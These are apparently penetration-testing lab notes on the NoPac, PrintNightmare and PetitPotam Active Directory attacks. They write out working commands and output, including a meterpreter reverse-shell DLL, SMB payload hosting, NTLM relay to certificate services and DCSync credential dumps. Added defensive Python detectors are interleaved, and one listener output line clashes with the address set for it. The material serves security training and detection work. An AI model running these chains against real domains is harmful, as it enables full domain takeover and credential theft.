🔪 Bleeding Edge Vulnerabilities

NoPac (SamAccountName Spoofing)

NoPac, also known as the sAMAccountName spoofing vulnerability, is an emerging threat disclosed at the end of 2021. The attack chains two CVEs: CVE-2021-42278 and CVE-2021-42287.

Together they may allow an attacker intra-domain privilege escalation from any standard domain user to Domain Admin level access.

The flow of the attack can be seen here

NoPac uses tools from Impacket to communicate with the target DC, upload a payload and issue commands from the attack host.

Installation

git clone https://github.com/Ridter/noPac.git

Scanning for NoPac

We can use the NoPac scanner to check if the system is vulnerable: with a standard domain user we attempt to obtain a TGT from the target DC. If we see ms-DS-MachineAccountQuota = 10 we know it is vulnerable, but if ms-DS-MachineAccountQuota = 0 the attack will fail because our user does not have the rights to add a new machine account.

sudo python3 scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap

[*] Current ms-DS-MachineAccountQuota = 10
[*] Got TGT with PAC from 172.16.5.5. Ticket size 1484
[*] Got TGT from ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL. Ticket size 663

Getting a Shell

Once we know the system is vulnerable, we can attempt to get a shell with SYSTEM-level privileges.

We should note that this could be considered "noisy" and may be blocked by AV programs.

sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5  -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap

DCSync the Built-in Admin Account

If successful, we will now have a .ccache file on our host.

We can use this file to perform a pass-the-ticket and then a DCSync attack.

sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5  -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user INLANEFREIGHT/administrator
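From the defender's side, the two signals behind this chain are a non-zero ms-DS-MachineAccountQuota (the precondition the scanner step checks) and a computer account being renamed so that its sAMAccountName loses the trailing `$` and matches a DC name. The following is an added example, not code from these notes or from the noPac project: it rates the quota value and flags the rename pattern in Windows Security events (4741 "computer account created", 4781 "account name changed"). The field names follow the Security log, the DC list is a hypothetical value for the lab domain on this page, and the events are constructed samples.

```python
"""Added example (not from the original notes or the noPac project):
rate ms-DS-MachineAccountQuota and flag the sAMAccountName rename
pattern of CVE-2021-42278 in Windows Security events 4741 and 4781."""
from __future__ import annotations

from dataclasses import dataclass
from typing import Iterable

# Hypothetical DC host names for the lab domain used on this page.
KNOWN_DCS = {"ACADEMY-EA-DC01"}

# Constructed sample events, shaped like Security log exports (not real data).
SAMPLE_EVENTS = [
    {"EventID": 4741, "SubjectUserName": "forend", "TargetUserName": "WKSTN-TEMP$"},
    {"EventID": 4781, "SubjectUserName": "forend",
     "OldTargetUserName": "WKSTN-TEMP$", "NewTargetUserName": "ACADEMY-EA-DC01"},
    {"EventID": 4781, "SubjectUserName": "forend",
     "OldTargetUserName": "ACADEMY-EA-DC01", "NewTargetUserName": "WKSTN-TEMP$"},
    {"EventID": 4781, "SubjectUserName": "admin",
     "OldTargetUserName": "OLDHOST$", "NewTargetUserName": "NEWHOST$"},
]


@dataclass
class Finding:
    severity: str
    event_id: int
    subject: str
    detail: str


def quota_risk(machine_account_quota: int) -> str:
    """Same test the scanner applies: a non-zero quota lets any domain user
    add computer accounts, which is the precondition for the attack."""
    if machine_account_quota > 0:
        return f"quota={machine_account_quota}: unprivileged users can add machine accounts"
    return "quota=0: unprivileged users cannot add machine accounts"


def find_samaccountname_spoofing(events: Iterable[dict], known_dcs: set[str]) -> list[Finding]:
    """Flag machine accounts whose sAMAccountName loses its trailing '$',
    escalating when the new name is a DC and when the same subject created
    the account shortly before (events are assumed to be in time order)."""
    findings: list[Finding] = []
    created_by: dict[str, set[str]] = {}
    for ev in events:
        eid, subj = ev["EventID"], ev["SubjectUserName"]
        if eid == 4741:
            created_by.setdefault(subj, set()).add(ev["TargetUserName"].upper())
            continue
        if eid != 4781:
            continue
        old, new = ev["OldTargetUserName"], ev["NewTargetUserName"]
        if old.endswith("$") and not new.endswith("$"):
            # Core of the technique: a computer account dropping its '$'.
            sev = "high" if new.upper() in known_dcs else "medium"
            detail = f"{old} renamed to {new}"
            if old.upper() in created_by.get(subj, set()):
                detail += " (same subject created the account)"
                sev = "critical" if sev == "high" else sev
            findings.append(Finding(sev, eid, subj, detail))
        elif new.endswith("$") and old.upper() in known_dcs:
            # The rename back after the TGT was obtained is a second strong signal.
            findings.append(Finding("high", eid, subj, f"{old} renamed back to {new}"))
    return findings


if __name__ == "__main__":
    print(quota_risk(10))
    for f in find_samaccountname_spoofing(SAMPLE_EVENTS, KNOWN_DCS):
        print(f.severity, f.event_id, f.subject, f.detail)
```

In a real deployment the `$`-less rename alone is worth an alert regardless of whether the new name matches a DC, since the list of DC names is only known to the defender.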

PrintNightmare

PrintNightmare is a vulnerability found in the Print Spooler service that runs on all Windows OSs. Many exploits have been created based on this to allow privilege escalation and remote code execution.

Install Exploit

git clone https://github.com/cube0x0/CVE-2021-1675.git

Install cube0x0's Version of Impacket

We must make sure that we are using cube0x0's version of Impacket, which the exploit requires.

pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install

Enumerating for MS-RPRN

We can use the command below to see if the Print System Asynchronous Remote Protocol (MS-PAR) and Print System Remote Protocol (MS-RPRN) are exposed on the target. Once confirmed, we can move on to the next step.

rpcdump.py @172.16.5.5 | egrep 'MS-RPRN|MS-PAR'
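The grep above answers only yes or no. As an added example (not from these notes or from Impacket), the following parser reads rpcdump.py-style output into records and reports which spooler interfaces are reachable remotely and on which bindings, which is the inventory a defender needs when deciding where the Print Spooler service should be disabled. The sample output is constructed in the shape rpcdump.py prints; the MS-RPRN and MS-PAR interface UUIDs are the published ones, the host and ports are lab values.

```python
"""Added example (not from the original notes or Impacket): parse
rpcdump.py-style output and report network-reachable spooler interfaces."""
from __future__ import annotations

import re

# Spooler protocols exploited by PrintNightmare; provider spoolsv.exe covers
# any additional interface the service registers.
SPOOLER_PROTOCOLS = {"MS-RPRN", "MS-PAR"}

# Constructed sample in the shape of rpcdump.py output (not a real capture).
SAMPLE_RPCDUMP = r"""
Protocol: [MS-SAMR]: Security Account Manager (SAM) Remote Protocol 
Provider: samsrv.dll 
UUID    : 12345778-1234-ABCD-EF00-0123456789AC v1.0 
Bindings: 
          ncacn_ip_tcp:172.16.5.5[49667]
          ncacn_np:\\ACADEMY-EA-DC01[\pipe\lsass]

Protocol: [MS-RPRN]: Print System Remote Protocol 
Provider: spoolsv.exe 
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0 
Bindings: 
          ncacn_ip_tcp:172.16.5.5[49691]
          ncacn_np:\\ACADEMY-EA-DC01[\pipe\spoolss]

Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Provider: spoolsv.exe 
UUID    : 76F03F96-CDFD-44FC-A22C-64950A001209 v1.0 
Bindings: 
          ncacn_ip_tcp:172.16.5.5[49691]

Protocol: N/A 
Provider: N/A 
UUID    : 0B6EDBFA-4A24-4FC6-8A23-942B1ECA65D1 v1.0 
Bindings: 
          ncacn_ip_tcp:172.16.5.5[49667]
"""


def parse_rpcdump(text: str) -> list[dict]:
    """Split the output into one record per interface (records are separated
    by a blank line) and pull out protocol, provider, UUID and bindings."""
    records: list[dict] = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec: dict = {"protocol": None, "description": "", "provider": None,
                     "uuid": None, "bindings": []}
        for raw in block.splitlines():
            line = raw.strip()
            if m := re.match(r"Protocol:\s*\[(\S+)\]:\s*(.*)", line):
                rec["protocol"], rec["description"] = m.group(1), m.group(2).strip()
            elif m := re.match(r"Provider:\s*(\S+)", line):
                rec["provider"] = m.group(1)
            elif m := re.match(r"UUID\s*:\s*([0-9A-Fa-f-]{36})", line):
                rec["uuid"] = m.group(1).upper()
            elif line.startswith(("ncacn_", "ncalrpc")):
                rec["bindings"].append(line)
        records.append(rec)
    return records


def spooler_exposure(records: list[dict]) -> dict[str, list[str]]:
    """Map each spooler interface to the bindings reachable from the network
    (ncalrpc is local-only and ignored)."""
    exposed: dict[str, list[str]] = {}
    for rec in records:
        if rec["protocol"] in SPOOLER_PROTOCOLS or rec["provider"] == "spoolsv.exe":
            remote = [b for b in rec["bindings"] if not b.startswith("ncalrpc")]
            if remote:
                exposed[rec["protocol"] or rec["uuid"]] = remote
    return exposed


if __name__ == "__main__":
    for name, bindings in spooler_exposure(parse_rpcdump(SAMPLE_RPCDUMP)).items():
        print(name, "->", ", ".join(bindings))
```

Pipe live rpcdump.py output into `parse_rpcdump` instead of the sample to run this against a host you are authorised to assess. A domain controller that shows MS-RPRN or MS-PAR bindings here is still running the Print Spooler service, which is the service the PrintNightmare fixes and Microsoft's hardening guidance recommend disabling on DCs.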

Generating a DLL Payload

We craft a DLL payload with msfvenom.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.225 LPORT=8080 -f dll > backupscript.dll

Generate a Share with smbserver.py

We will host the payload in an SMB share.

sudo smbserver.py -smb2support CompData /path/to/backupscript.dll

Setting up MSF multi/handler

Once the share is created and hosting our payload, we can set up a listener to catch the reverse shell.

[msf](Jobs:0 Agents:0) >> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set LHOST 172.16.5.225
LHOST => 10.3.88.114
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set LPORT 8080
LPORT => 8080
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> run

[*] Started reverse TCP handler on 172.16.5.225:8080 

Running the Exploit

We make sure to have \\<ip address of attack host>\ShareName\nameofpayload.dll in our command, then we can finally run the exploit. If it is successful, we will receive an elevated SYSTEM shell.

sudo python3 CVE-2021-1675.py inlanefreight.local/forend:Klmcargo2@172.16.5.5 '\\172.16.5.225\CompData\backupscript.dll'
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

PetitPotam (MS-EFSRPC)

PetitPotam is an LSA spoofing vulnerability that was patched in 2021. The exploit allows an unauthenticated attacker to coerce a DC to authenticate against another host using NTLM over port 445 via the Local Security Authority Remote Protocol (LSARPC).

This allows an attacker to take over a Windows domain where Active Directory Certificate Services (AD CS) is in use.

In the attack, an authentication request from the target DC is relayed to the CA host's Web Enrollment page, which makes a Certificate Signing Request (CSR) for a new certificate. This certificate can be used with a tool such as Rubeus or gettgtpkinit.py to request a TGT for the DC.

To find the location of the CA we can use a tool like https://github.com/zer1t0/certi.

Starting ntlmrelayx.py

We first start ntlmrelayx.py specifying the enrollment URL for the CA host.

sudo ntlmrelayx.py -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController

[*] Setting up WCF Server

[*] Servers started, waiting for connections

Running PetitPotam

In another window, we can start PetitPotam and pass in the attack host IP and DC IP.

python3 PetitPotam.py 172.16.5.225 172.16.5.5

Trying pipe lsarpc
[-] Connecting to ncacn_np:172.16.5.5[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!

[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

Catching Base64 Encoded Certificate for DC01

If the coerced authentication was relayed successfully, the ntlmrelayx.py window should now show the base64 certificate for the DC.

sudo ntlmrelayx.py -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController

Requesting a TGT

We can use the base64 cert with gettgtpkinit.py to request a TGT for the DC.

python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 MIIStQIBAzCCEn8GCSqGSI...SNIP...CKBdGmY= dc01.ccache

Setting the KRB5CCNAME Env Variable

The TGT was saved as the file dc01.ccache, which we can pass into the KRB5CCNAME environment variable so our attack host uses this file for Kerberos authentication attempts.

export KRB5CCNAME=dc01.ccache

Using Domain Controller TGT to DCSync

We can use this TGT with secretsdump.py to perform a DCSync and retrieve one or all NTLM hashes for the domain.

secretsdump.py -just-dc-user INLANEFREIGHT/administrator -k -no-pass "ACADEMY-EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL

Confirming Admin Access to the DC

crackmapexec smb 172.16.5.5 -u administrator -H 88ad09182de639ccc6579eb0849751cf

Submitting a TGS Request for Ourselves using getnthash.py

We can use the tool getnthash.py to request the NT hash for our target using Kerberos U2U to submit a TGS request with the Privilege Attribute Certificate (PAC).

python /opt/PKINITtools/getnthash.py -key 70f805f9c91ca91836b670447facb099b4b2b7cd5b762386b3369aa16d912275 INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$

Using DC NTLM Hash to DCSync

We can use the obtained hash to perform a DCSync.

secretsdump.py -just-dc-user INLANEFREIGHT/administrator "ACADEMY-EA-DC01$"@172.16.5.5 -hashes aad3c435b514a4eeaad3b935b51304fe:313b6f423cd1ee07e91315b4919fb4ba

Requesting TGT with Rubeus

We could alternatively use the certificate we obtained earlier with Rubeus on the Windows attack host to request a TGT and perform a PTT attack.

.\Rubeus.exe asktgt /user:ACADEMY-EA-DC01$ /certificate:MIIStQIBAzC...SNIP...IkHS2vJ51Ry4= /ptt

[+] Ticket successfully imported!

  ServiceName              :  krbtgt/INLANEFREIGHT.LOCAL
  ServiceRealm             :  INLANEFREIGHT.LOCAL
  UserName                 :  ACADEMY-EA-DC01$
  UserRealm                :  INLANEFREIGHT.LOCAL
  StartTime                :  3/30/2022 3:50:25 PM
  EndTime                  :  3/31/2022 1:50:25 AM
  RenewTill                :  4/6/2022 3:50:25 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  d/AohN1w1ZZXsks8cCUlbg==
  ASREP (key)              :  2A621F62C32241F38FA68826E95521DD

Confirming the Ticket is in Memory

We can check to see if the ticket is in memory.

klist

Performing DCSync with Mimikatz

Finally, we can perform the attack with the PTT.

PS C:\Tools> cd .\mimikatz\x64\
PS C:\Tools\mimikatz\x64> .\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # lsadump::dcsync /user:inlanefreight\krbtgt
[DC] 'INLANEFREIGHT.LOCAL' will be the domain
[DC] 'ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'inlanefreight\krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 10/27/2021 8:14:34 AM
Object Security ID   : S-1-5-21-3842939050-3880317879-2865463114-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: 16e26ba33e455a8c338142af8d89ffbc
    ntlm- 0: 16e26ba33e455a8c338142af8d89ffbc
    lm  - 0: 4562458c201a97fa19365ce901513c21
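Every path in the PetitPotam section, whether it ends in secretsdump.py or in Mimikatz, leaves the same two traces on the DC: a certificate-based (PKINIT) TGT for a DC machine account requested from an address that is not that DC, followed by directory replication (the DCSync at the end of this section, and likewise the NoPac -dump step earlier on the page). The following is an added example, not code from these notes, Impacket, PKINITtools or Mimikatz: it correlates Security events 4768 (TGT requested) and 4662 (operation on a directory object) over constructed samples. The DC-to-address map is a hypothetical value for the lab domain, the CA name is a placeholder, and the replication control-access GUIDs are the published ones.

```python
"""Added example (not from the original notes or any of the tools named
on this page): correlate 4768 certificate logons for DC accounts from
foreign addresses with 4662 replication (DCSync) activity."""
from __future__ import annotations

from dataclasses import dataclass

# Hypothetical map of DC machine accounts to the address each DC normally uses.
DC_ACCOUNTS = {"ACADEMY-EA-DC01$": "172.16.5.5", "ACADEMY-EA-DC02$": "172.16.5.6"}

# 4768 Pre-Authentication Type values that indicate a certificate (PKINIT) logon.
PKINIT_PREAUTH = {15, 16, 17}

# Control-access rights that grant directory replication (the DCSync rights).
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}

# Constructed sample events in chronological order (not real log data).
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "ACADEMY-EA-DC01$", "IpAddress": "::ffff:172.16.5.225",
     "PreAuthType": 16, "CertIssuerName": "PLACEHOLDER-CA"},
    {"EventID": 4768, "TargetUserName": "ACADEMY-EA-DC01$", "IpAddress": "::ffff:172.16.5.5",
     "PreAuthType": 2, "CertIssuerName": ""},
    {"EventID": 4662, "SubjectUserName": "ACADEMY-EA-DC01$",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "administrator",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "ACADEMY-EA-DC02$",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
]


@dataclass
class Finding:
    severity: str
    event_id: int
    detail: str


def normalize_ip(value: str) -> str:
    """Windows logs IPv4 clients as IPv4-mapped IPv6 (::ffff:a.b.c.d)."""
    return value.removeprefix("::ffff:")


def detect_dc_impersonation_chain(events: list[dict]) -> list[Finding]:
    """Flag certificate TGTs for DC accounts from the wrong address, then
    escalate any replication those accounts perform afterwards. Replication
    by a non-DC principal is flagged on its own; replication by other DC
    accounts is normal DC-to-DC traffic and ignored."""
    findings: list[Finding] = []
    suspect_dc_accounts: set[str] = set()
    for ev in events:
        if ev["EventID"] == 4768:
            acct = ev["TargetUserName"]
            if acct not in DC_ACCOUNTS:
                continue
            cert_logon = ev.get("PreAuthType") in PKINIT_PREAUTH or bool(ev.get("CertIssuerName"))
            src = normalize_ip(ev["IpAddress"])
            if cert_logon and src != DC_ACCOUNTS[acct]:
                suspect_dc_accounts.add(acct)
                findings.append(Finding("high", 4768,
                    f"certificate TGT for {acct} requested from {src}, expected {DC_ACCOUNTS[acct]}"))
        elif ev["EventID"] == 4662:
            subj = ev["SubjectUserName"]
            props = ev.get("Properties", "").lower()
            if not any(g in props for g in REPLICATION_GUIDS):
                continue
            if subj in suspect_dc_accounts:
                findings.append(Finding("critical", 4662,
                    f"replication by {subj} after a certificate TGT from a foreign address"))
            elif subj not in DC_ACCOUNTS:
                findings.append(Finding("high", 4662, f"replication by non-DC principal {subj}"))
    return findings


if __name__ == "__main__":
    for f in detect_dc_impersonation_chain(SAMPLE_EVENTS):
        print(f.severity, f.event_id, f.detail)
```

The 4662 event does not carry a client address, so the correlation key is the account name; feeding events out of time order will miss the critical escalation, which is why the sample is ordered and real input should be sorted by TimeCreated first.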
